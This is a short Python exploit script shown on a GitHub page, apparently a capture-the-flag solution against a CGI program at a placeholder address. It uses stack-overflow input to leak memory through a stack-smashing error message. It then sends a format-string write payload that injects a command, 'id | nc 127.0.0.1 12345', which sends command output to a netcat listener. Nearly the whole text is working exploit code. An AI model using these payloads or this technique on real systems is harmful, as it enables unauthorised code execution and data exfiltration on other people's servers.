-
Notifications
You must be signed in to change notification settings - Fork 477
/
Copy pathexploit.py
40 lines (33 loc) · 945 Bytes
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import requests
from urllib import urlencode
from struct import pack, unpack
URL = 'http://1.2.3.4/cgi-bin/nanana'
def leak(address):
address = pack('I', address)
address = address.strip('\x00')
payload = {
'username': 'A'*349,
'password': 'B'*380,
'job': 'C'*392 + address
}
r = requests.get(URL+'?'+urlencode(payload))
l = r.headers['*** stack smashing detected ***']
l = l.strip(' terminated')
l = l.ljust(8, '\x00')
try:
return unpack('Q', l)
except:
return l
def e(cmd, pwd):
payload = {
'username': cmd,
'password': pwd,
'job': '\x48\x10\x60',
'action': '%198x%15$hhn'
}
print urlencode(payload)
r = requests.get(URL+'?'+urlencode(payload))
if __name__ == '__main__':
pwd = leak(0x601090)
print 'pwd @ %s' % pwd
e('id | nc 127.0.0.1 12345',pwd=pwd)